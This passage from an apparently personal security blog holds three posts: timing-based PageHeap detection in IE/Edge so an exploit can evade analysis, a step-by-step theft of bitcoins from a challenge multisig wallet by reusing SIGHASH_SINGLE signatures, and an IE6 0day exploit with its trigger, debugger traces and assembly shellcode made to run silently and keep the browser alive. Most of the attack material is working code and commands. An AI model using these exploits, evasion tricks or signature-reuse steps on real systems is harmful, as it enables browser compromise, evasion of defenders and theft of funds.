<p>It’s used like <code class="language-plaintext highlighter-rouge">var buf = new Uint8Array(len)</code>. And from tracing the function, both IE and Edge, when create the ArrayBuffer, will directly call <code class="language-plaintext highlighter-rouge">msvcrt!malloc</code> with the value we specify. What a catch!</p>
<p>For the small and big values, I will be using 0x10 and 0x1000 respectively because the big one will always trigger a call to VirtualAlloc. The method I will use is try to allocate as many <code class="language-plaintext highlighter-rouge">Uin8Array</code> as possible in <strong>20ms</strong> for both small and big allocations.</p>
<p>Ok, enough, show me the code!</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">fun</span><span class="p">,</span> <span class="nx">time</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">store</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">startTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">j</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="nx">j</span><span class="o"><</span><span class="mi">100</span><span class="p">;</span> <span class="nx">j</span><span class="o">++</span><span class="p">)</span>
<span class="nx">store</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">fun</span><span class="p">());</span>
<span class="nx">i</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span><span class="p">((</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">startTime</span><span class="p">)</span> <span class="o"><</span> <span class="nx">time</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">i</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">allocPageBA</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="k">new</span> <span class="nb">Uint8Array</span><span class="p">(</span><span class="mh">0x1000</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">allocSmallBA</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="k">new</span> <span class="nb">Uint8Array</span><span class="p">(</span><span class="mh">0x10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">bigRet</span> <span class="o">=</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">allocPageBA</span><span class="p">,</span> <span class="nx">ALLOC_TIME</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">smallRet</span> <span class="o">=</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">allocSmallBA</span><span class="p">,</span> <span class="nx">ALLOC_TIME</span><span class="p">);</span>
<span class="nx">alert</span><span class="p">(</span><span class="nx">bigRet</span><span class="p">);</span>
<span class="nx">alert</span><span class="p">(</span><span class="nx">smallRet</span><span class="p">);</span>
</code></pre></div></div>
<p>Now, this is a little inconvenient because we are introducing other allocations while we measure allocations.</p>
<p>To resolve that piece of error-inducing code, I created an object that will pre-allocate an Array and then will store the objects in there thus no generating new allocations.</p>
<p>Also, realize that I’m saving the objects allocated to prevent the garbage collector to kick in and free them which would introduce another error in the measurements.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">NoAllocStore</span><span class="p">(</span><span class="nx">count</span><span class="p">)</span> <span class="p">{</span>
<span class="k">this</span><span class="p">.</span><span class="nx">count</span> <span class="o">=</span> <span class="nx">count</span><span class="p">;</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Array</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o"><</span><span class="nx">count</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x41414141</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">this</span><span class="p">.</span><span class="nx">index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">NoAllocStore</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">store</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">index</span> <span class="o">>=</span> <span class="k">this</span><span class="p">.</span><span class="nx">count</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">bad</span><span class="dl">"</span><span class="p">);</span>
<span class="k">throw</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span><span class="p">[</span><span class="k">this</span><span class="p">.</span><span class="nx">index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">obj</span><span class="p">;</span>
<span class="k">this</span><span class="p">.</span><span class="nx">index</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The final code is <a href="https://github.com/snf/exploit/blob/master/anomalies/pageheap/detect.html">here</a>. I ran it a few times (250 to be exactly) and compared the distribution of what I got in both browsers with PageHeap disabled and enabled.</p>
<p>The distributions I got in IE11 was:</p>
<p><img src="http://snf.github.io/public/data/pageheap/ie11.png" alt="IE11 count of small allocations/count of big allocations" /></p>
<p>In more detail to see when the distributions start mixing:</p>
<p><img src="http://snf.github.io/public/data/pageheap/ie11_zoom.png" alt="IE11 count of small allocations/count of big allocations zoomed" /></p>
<p>It’s very visible that the PageHeap-enabled one has a more dense distribution and hence, is more deterministic on the time of allocations. It can be attributed to the page allocation being much more time-expensive than the heap, making other parts of the code less influential on the overall time.</p>
<p>As homework, fellow hacker, you might want to measure the number of total instructions executed (ring0 and ring3) after each <code class="language-plaintext highlighter-rouge">malloc</code> call using a system emulator or debugger.</p>
<p>For Edge, the distributions are very similar but you can notice that they are much more separated and 3x is a conservative and very good number to draw the line at:</p>
<p><img src="http://snf.github.io/public/data/pageheap/edge.png" alt="Edge count of small allocations/count of big allocations" /></p>
<p>I will set the limit at 2x for IE and 3x for Edge, and anything under this limit will be classified as PageHeap enabled. The other cases will be <strong>assumed</strong> safe for execution.</p>
<p>You can check your IE or Edge browser with this file <a href="http://snf.github.io/public/data/pageheap/detect.html">detect.html</a> and ping me back if you are getting different results. Also, if you are interested, the code used for retrieving and analysing the data is at <a href="">https://github.com/snf/exploit/tree/master/anomalies/pageheap</a>.</p>
<h3 id="conclusion">Conclusion</h3>
<p>It has been demonstrated that with <strong>40ms</strong>, you can make a quick exercise to analyze if PageHeap is present and if it’s worth continuing with the exploit or not.</p>
<p>Thanks for reading, if you have any extra information or know of a better method, please let me know. Also stay tuned for future posts on detecting other tools.</p>
<ul>
<li>Follow me in Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
<h3 id="warranties">Warranties</h3>
<p>This is an experiment and by no means you should trust it without running further tests under different cpus and virtualization technologies. Remember this is one of those ItWorksInMyPC(TM) projects.</p>
<p>I take no blame if your exploit is executed by a honeypot, the bug patched and you make the news for APTing people.</p>
Coinspect OP_CHECKSIG challenge2014-08-06T00:00:00+00:00http://snf.github.io/2014/08/06/coinspect-op_checksig-challenge<h3 id="introduction">Introduction</h3>
<p>The challenge from
<a href="http://blog.coinspect.co/copay-wallet-emptying-vulnerability">Coinspect</a>
and <a href="http://www.ekoparty.org/">Ekoparty conference</a> consisted in
taking the bitcoins from a multisig or p2sh (pay to script hash)
wallet:
<a href="https://blockchain.info/address/32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe">https://blockchain.info/address/32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe</a></p>
<p>I’m making this post as short as possible, and for understanding it,
you may need previous knowledge about bitcoin internals.</p>
<h3 id="understanding-op_checksig-opcode">Understanding OP_CHECKSIG opcode</h3>
<p>This is a fuzzy and complicated part of validating bitcoin
transactions. It’s explained
<a href="https://bitcointalk.org/index.php?topic=260595.0">here</a>.</p>
<p>When OP_CHECKSIG is reached in a script it needs that the public key
and the signature are in the stack. It takes the hash type from the
signature’s last byte and depending on it, takes an specific approach
to verifying the signature.</p>
<p>The internals of this opcode is, having the transaction serialized,
strip parts of it depending on the hash type, hashing it and then
comparing that the signature is valid for that hash and for the public
key provided in the stack.</p>
<p>In this challenge a P2SH address is provided. It means that the
scriptSig consists of many signatures and a redeem script.</p>
<p>This redeem script contains the public keys that can be used and how
many of them are neccesary for validating the script. In this example
needs 2 of 3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{2 [pubkey1] [pubkey2] [pubkey3] 3 OP_CHECKMULTISIG}
</code></pre></div></div>
<p>The OP_CHECKMULTISIG opcode runs OP_CHECKSIG for every
signature available. If those signatures are good, then it returns
True. If any of them fail, it returns False.</p>
<h3 id="bug-in-sighash_single">Bug in SIGHASH_SINGLE</h3>
<p>In case the signature ends with <strong>03</strong>, then SIGHASH_SINGLE mode is
choosen.</p>
<p>This mode is supposed to strip the other outputs that doesn’t
correspond to the same index of the input before hashing the
transaction and checking that the signature is valid.</p>
<p>The problem is that SIGHASH_SINGLE is supposed to sign only one
output, the output that is in the same index as this input. In case
there are less outputs than inputs, then it should probably fail. But
because a bug in the initial implementation of bitcoind, it was
validating it and signing a hardcoded hash.</p>
<p>From the bitcoin wiki, it describes that if there is no output in the
same index of the input, then the hash of the transaction assumed to
be signed is
“0000000000000000000000000000000000000000000000000000000000000001”.
(there is a whole thread about this behavior <a href="https://bitcointalk.org/index.php?topic=260595.0">here</a>). This invalidates
the fact of a signature, because no inputs nor outputs are signed but
instead, a hard-coded string is.</p>
<p>It means that this signature can be reused in case we need to sign
000..01 again.</p>
<h3 id="the-challenge">The challenge</h3>
<p>Going back to the Coinspect’s wallet
32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe, we detect that there is already an
outgoing transaction:
<a href="https://blockchain.info/tx/6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132">6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132</a>.</p>
<p>The sigScript from the third input of the transaction:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0
3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903
304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803
5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae
</code></pre></div></div>
<p>So we start analyzing the inputs and detect that these are multisigned
(2 of 3) and as the signatures end with <strong>03</strong>, correspond to
SIGHASH_SINGLE working mode.</p>
<p>The last input doesn’t have a corresponding output, so it means that
the last input’s signatures are signing the hash 000..01, so we can
reuse those same signatures in case we need to sign the hardcoded hash
again.</p>
<p>With that signature we can sign any input which index is bigger than
the amount of outputs. In case we are using one output, that leaves us
with the input at index 0 to be external to that address because we
can not reuse the signatures for it. And we are adding an input from an
address we control with the smallest amount possible.</p>
<h3 id="taking-the-bitcoins">Taking the bitcoins</h3>
<p>I’m using sx for the solution.</p>
<p>Create a new transaction with the first input from an address I
control and the other 2 with inputs from the coinspect’s wallet:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sx mktx txfile.tx -i 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0 -i 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1 -i 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0 -o 197iAesReT4Z6chRqnsficr3LQpVxBdv1J:3100000
Added input 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0
Added input 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1
Added input 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0
Added output sending 3100000 Satoshis to 197iAesReT4Z6chRqnsficr3LQpVxBdv1J.
</code></pre></div></div>
<p>Create the script for the first input signing it and adding my
public key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ DECODED_ADDR=$(cat private.key | sx addr | sx decode-addr)
$ PREVOUT_SCRIPT=$(sx rawscript dup hash160 [ $DECODED_ADDR ] equalverify checksig)
$ SIGNATURE=$(cat private.key | sx sign-input txfile.tx 0 $PREVOUT_SCRIPT)
$ SCRIPT=$(sx rawscript [ $SIGNATURE ] [ $(cat private.key | sx pubkey) ])
$ sx set-input txfile.tx 0 $SCRIPT > signedtx
</code></pre></div></div>
<p>Now I will add the reused signature for the other two inputs, those
inputs don’t have a corresponding output, so they only need to sign
000..01, which we already have the signature for (remember the third
input from the previous transaction?):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ SIGN_1=3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903
$ SIGN_2=304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803
$ REDEEM_SCRIPT=5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae
$ REUSED_SCRIPT=$(sx rawscript zero [ $SIGN_1 ] [ $SIGN_2 ] [ $REDEEM_SCRIPT ])
$ sx set-input signed-tx 1 $REUSED_SCRIPT > signed-tx2
$ sx set-input signed-tx2 2 $REUSED_SCRIPT > signed-tx_final
</code></pre></div></div>
<p>So now we have the transaction complete and ready to broadcast. I did
it on blockr.io because blockchain was complaining about the script
containing 4 instructions instead of 2.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat signed-tx_final
010000000350b4875c40c06c451937792e338b3165850536395d4f914360c66aa215da7320000000008a473044022043dfdc32cbe03f06200d4f1da806336cb79565c482432e60a6ad0c55dbb5947b02201cd22de62cf8ffc09288ff87ccac93038978e4d9d746b41bfb07614ce161f472014104e824c125eb482debade1f47f0225959b0e15fc667fd281b8e1cc99e08a5ab2285583d6fdcc6b61906d454249a76e666bd03e883df017054a04cc77d1b7dce92dffffffff5c83b8007479d0126effcba58cb8d9e6164e79ea56bf57618edcf10417fb9b9601000000fdfd0000483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53aeffffffff633f872c9a26a767b92110b86970f5e2c5fe2bcb9ab55f5869c8890fbf9ff39b00000000fdfd0000483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53aeffffffff01604d2f00000000001976a9145905ddb52ed55abc9f8f4a58a8323296c642e93288ac00000000
$ sx showtx signed-tx_final
hash: 32aadcd309ea3fb30bd9490ee6417e378dad5111c21563ce532a6917b776051b
version: 1
locktime: 0
Input:
previous output: 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0
script: [ 3044022043dfdc32cbe03f06200d4f1da806336cb79565c482432e60a6ad0c55dbb5947b02201cd22de62cf8ffc09288ff87ccac93038978e4d9d746b41bfb07614ce161f47201 ] [ 04e824c125eb482debade1f47f0225959b0e15fc667fd281b8e1cc99e08a5ab2285583d6fdcc6b61906d454249a76e666bd03e883df017054a04cc77d1b7dce92d ]
sequence: 4294967295
address: 16LvhDHHrcGXEeHtYu6W99kwptuS6Vp59B
Input:
previous output: 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1
script: zero [ 3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903 ] [ 304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803 ] [ 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae ]
sequence: 4294967295
address: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe
Input:
previous output: 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0
script: zero [ 3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903 ] [ 304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803 ] [ 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae ]
sequence: 4294967295
address: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe
Output:
value: 3100000
script: dup hash160 [ 5905ddb52ed55abc9f8f4a58a8323296c642e932 ] equalverify checksig
address: 197iAesReT4Z6chRqnsficr3LQpVxBdv1J
</code></pre></div></div>
<p>You can check the transaction and it’s details <a href="http://webbtc.com/tx/0db11d06a139756d7f9d4a9257a3fbbb64256d0d7b88d08507872edb228996d3">here</a> .</p>
<p>Thanks for reading!</p>
Process continuation after exploit (aka. IE is my process launcher)2010-11-15T00:00:00+00:00http://snf.github.io/2010/11/15/process-continuation-after-exploit<p>This is an old post from one of my old blogs so reposting here for eternity (not one of the most elegant teks, looking at you Seba from the past).</p>
<p>Last week another 0day was discovered in the wild exploiting Internet Explorer. And as the bug wasn’t hard
to trigger/exploit in IE 6, I thought that it would be good to add another decoration to this exploit.
As last week I was also talking to some friends about why exploit writers are not interested on recovering process (or why don’t they do it), I decided to write this post.
Here will describe how to make IE6 continue after it has been successfully exploited using last 0day bug.</p>
<p>The trigger for the bug is: <code class="language-plaintext highlighter-rouge"><table style="position: absolute; clip: rect(0);"></code></p>
<p>When we trigger the bug we see that we are using a defaced vtable, in my IE, i see that the jump comes from <code class="language-plaintext highlighter-rouge">EnsureDispNodeBackground</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000> ub 7dcb1c3f
mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d 33f6 xor esi,esi
7dcb1c2f 46 inc esi
7dcb1c30 56 push esi
7dcb1c31 8bcf mov ecx,edi
7dcb1c33 e813e2ffff call mshtml!CDispNode::SetBackground (7dcafe4b)
7dcb1c38 8b07 mov eax,dword ptr [edi] ;<-- pointer to chaos
7dcb1c3a 8bcf mov ecx,edi
7dcb1c3c ff5030 call dword ptr [eax+30h]
</code></pre></div></div>
<p>As you can see, the object is in edi, so it takes the vtable from object[0] and then dereferences vtable+0×30 to get the function.</p>
<p>After some research discovered that the vtable address was being overwritten by the function <code class="language-plaintext highlighter-rouge">CDispNode::SetUserClip</code> when trying to set a flag on a miscalculated address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0 e8b4ddffff call mshtml!CRect::RestrictRange (7dd89389)
7dd8b5d5 8b4704 mov eax,dword ptr [edi+4]
7dd8b5d8 23c6 and eax,esi
7dd8b5da 0fb688101cc37d movzx ecx,byte ptr mshtml!CDispNode::_extraSizeTable (7dc31c10)[eax]
7dd8b5e1 8bc7 mov eax,edi
7dd8b5e3 c1e102 shl ecx,2
7dd8b5e6 2bc1 sub eax,ecx
7dd8b5e8 830801 or dword ptr [eax],1 ;<-- the address of the vtable is on *eax
</code></pre></div></div>
<p>The main idea of autorecovering exploits is that we can give the process the same state that it had before being exploited and this bug is perfect for this!.
The only corruption we have when the bug is triggered is 1 bit (afaik). We don’t really know if the vtable of the object is used again, but we are gonna fix it and set eax to 0 (the function failed).</p>
<p>I have used this shellcode <a href="http://code.google.com/p/w32-exec-calc-shellcode/">w32-exec-calc-shellcode</a> , greets to berendjanwever for being first on google when searching calc shellcode and having a working one, you deserve the mention!
I have not made any modification to it, just added a prologue and epilogue to save/recover the state.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BITS 32
;;; lets patch vtable address
and dword [edi], 0xFFFFFFFE
;;; save registers
pushad
;;; push a mark on the stack
;;; (lazy stack recovery after the payload is executed)
push 0xdead1337
;; here starts the shellcode for launching the calculator
;; ============================================
xor esi,esi
push esi
mov esi,[fs:esi+0x30]
mov esi,[esi+0xc]
mov esi,[esi+0x1c]
l1:
mov ebp,[esi+0x8]
mov esi,[esi]
mov ebx,[ebp+0x3c]
mov ebx,[ebp+ebx+0x78]
add ebx,ebp
mov ecx,[ebx+0x18]
jcxz l1
l2:
mov edi,[ebx+0x20]
add edi,ebp
mov edi,[edi+ecx*4-0x4]
add edi,ebp
xor eax,eax
cdq
l3:
xor dl,[edi]
ror dx,0x1
scasb
jnz l3
cmp dx,0xf510
loopne l2
jnz l1
mov edx,[ebx+0x24]
add edx,ebp
movzx edx,word [edx+ecx*2]
mov edi,[ebx+0x1c]
add edi,ebp
add ebp,[edi+edx*4]
push dword 0x6578652e
push dword 0x636c6163
push esp
xchg eax,[esp]
push eax
call ebp
;; ============================================
;;; then recover stack, search for our mark
l10:
pop eax
cmp eax, 0xdead1337
jne l10
;;; restore registers
popad
;;; return from the function with error
xor eax,eax
;;; if the function had arguments we should clean them
;;; depending on the calling convention (not here :-) )
ret
;;; should never reach this point
int3
</code></pre></div></div>
<p>As we can see, recovering from the exploit is not difficult for this bug. Anyways, it could be pretty more difficult when exploiting other bugs that do more memory corruption.</p>
<p>The final working exploit is here: <a href="http://snf.github.io/public/data/ie_clip.html">ie_clip.html</a> (open at your own risk ;-) ).</p>
<p>And the demo (for not believers) showing the exploit working 3 times and Internet Explorer still working: <a href="http://www.youtube.com/watch?v=dgV9q9Cw0PU">http://www.youtube.com/watch?v=dgV9q9Cw0PU</a>.</p>
<p>Interesting slides about process continuation:
<a href="http://www.immunitysec.com/downloads/skylar_cansecwest09.pdf">User Friendly Exploits</a></p>
<p>Greetz to all my friends and coworkers.
And sorry to all of you who were expecting a spanish post.</p>